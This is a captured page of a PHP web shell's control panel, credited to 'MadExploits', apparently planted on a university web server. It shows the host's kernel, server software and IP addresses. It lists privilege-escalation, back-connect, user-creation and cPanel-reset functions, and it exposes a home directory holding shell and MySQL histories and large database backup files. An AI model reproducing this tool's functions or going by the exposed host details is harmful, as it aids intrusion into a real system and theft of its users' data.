Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.147.52.243
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
www /
html /
home /
appadmin /
[ HOME SHELL ]
Name
Size
Permission
Action
.cache
[ DIR ]
drwx------
.local
[ DIR ]
drwxr-xr-x
aaou2024.aiou.edu.pk
[ DIR ]
drwxr-xr-x
cesa2025
[ DIR ]
drwxr-xr-x
icecd2025
[ DIR ]
drwxr-xr-x
icrpe2025
[ DIR ]
drwxr-xr-x
icrpe25
[ DIR ]
drwxr-xr-x
icrpebackup
[ DIR ]
drwxr-xr-x
oric.aiou.edu.pk
[ DIR ]
drwxr-xr-x
oric.aiou.edu.pk_old
[ DIR ]
drwxr-xr-x
.Xauthority
322
B
-rw-------
.bash_history
14.15
KB
-rw-------
.bash_logout
220
B
-rw-r--r--
.bashrc
3.68
KB
-rw-r--r--
.mysql_history
562
B
-rw-------
.profile
807
B
-rw-r--r--
.sudo_as_admin_successful
0
B
-rw-r--r--
aaou.sql
20.75
MB
-rw-r--r--
aaou_db.sql
17.16
MB
-rw-r--r--
conf.sql
0
B
-rw-r--r--
elementor-pro.3.22.1.zip
3.94
MB
-rw-r--r--
elementor-pro.zip
4.12
MB
-rw-r--r--
elementor.3.22.2.zip
11.2
MB
-rw-r--r--
full_backup.sql
121.56
MB
-rw-r--r--
index.php
405
B
-rw-r--r--
wordpress.zip
24.62
MB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .profile
# ~/.profile: executed by the command interpreter for login shells. # This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login # exists. # see /usr/share/doc/bash/examples/startup-files for examples. # the files are located in the bash-doc package. # the default umask is set in /etc/profile; for setting the umask # for ssh logins, install and configure the libpam-umask package. #umask 022 # if running bash if [ -n "$BASH_VERSION" ]; then # include .bashrc if it exists if [ -f "$HOME/.bashrc" ]; then . "$HOME/.bashrc" fi fi # set PATH so it includes user's private bin if it exists if [ -d "$HOME/bin" ] ; then PATH="$HOME/bin:$PATH" fi # set PATH so it includes user's private bin if it exists if [ -d "$HOME/.local/bin" ] ; then PATH="$HOME/.local/bin:$PATH" fi
Close